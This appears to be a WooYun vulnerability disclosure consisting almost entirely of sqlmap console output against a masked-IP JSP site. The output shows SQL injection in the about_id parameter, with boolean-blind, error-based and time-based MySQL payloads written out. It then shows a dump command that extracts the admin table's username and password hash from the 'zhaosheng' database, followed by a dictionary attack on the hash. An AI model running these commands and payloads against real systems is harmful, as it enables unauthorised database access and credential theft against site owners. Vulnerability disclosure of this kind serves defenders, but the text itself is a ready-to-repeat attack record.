WooYun.org

$python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21"
[16:52:42] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file
[16:52:42] [INFO] testing connection to the target url
[16:52:42] [INFO] testing if the url is stable, wait a few seconds
[16:52:43] [INFO] url is stable
[16:52:43] [INFO] testing if GET parameter 'about_id' is dynamic
[16:52:43] [INFO] confirming that GET parameter 'about_id' is dynamic
[16:52:43] [INFO] GET parameter 'about_id' is dynamic
[16:52:43] [INFO] heuristic test shows that GET parameter 'about_id' might be injectable (possible DBMS: MySQL)
[16:52:43] [INFO] testing sql injection on GET parameter 'about_id'
[16:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:52:43] [INFO] GET parameter 'about_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:52:46] [INFO] GET parameter 'about_id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:52:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:52:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:53:10] [INFO] GET parameter 'about_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:53:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:53:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'about_id' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: about_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: about_id=21 AND 4339=4339
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: about_id=21 AND SLEEP(5)
---
[17:01:09] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[17:01:09] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 25 times
[17:01:09] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'
[*] shutting down at: 17:01:09
python sqlmap.py -u "http://**.**.**.**:8081/about.jsp?about_id=21" -D zhaosheng -T admin -C charge,id,password,username --dump
[*] starting at: 17:02:16
[17:02:16] [INFO] using 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\session' as session file
[17:02:16] [INFO] resuming injection data from session file
[17:02:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:02:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: about_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: about_id=21 AND 4339=4339
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: about_id=21 AND (SELECT 1114 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,117,98,58),(SELECT (CASE WHEN (1114=1114) THEN 1 ELSE 0 END)),CHAR(58,115,100,119,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: about_id=21 AND SLEEP(5)
---
[17:02:16] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[17:02:16] [INFO] fetching columns 'charge, id, password, username' entries for table 'admin' on database 'zhaosheng'
[17:02:16] [INFO] the SQL query used returns 1 entries
[17:02:16] [INFO] retrieved: 3
[17:02:16] [INFO] retrieved: 4
[17:02:16] [INFO] retrieved: ********************************
[17:02:16] [INFO] retrieved: admin
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y
[17:02:19] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [D:\Documents\Desktop\sqlmap\txt\wordlist.txt]
[17:02:20] [INFO] loading dictionary from: 'D:\Documents\Desktop\sqlmap\txt\wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] N
[17:02:23] [INFO] starting dictionary attack (md5_generic_passwd)
[17:02:23] [WARNING] no clear password(s) found
Database: zhaosheng
Table: admin
[1 entry]
+--------+----+----------------------------------+----------+
| charge | id | password                         | username |
+--------+----+----------------------------------+----------+
| 3      | 4  | ******************************** | admin    |
+--------+----+----------------------------------+----------+
[17:02:23] [INFO] Table 'zhaosheng.admin' dumped to CSV file 'D:\Documents\Desktop\sqlmap\output\**.**.**.**\dump\zhaosheng\admin.csv'
[17:02:23] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 5 times
[17:02:23] [INFO] Fetched data logged to text files under 'D:\Documents\Desktop\sqlmap\output\**.**.**.**'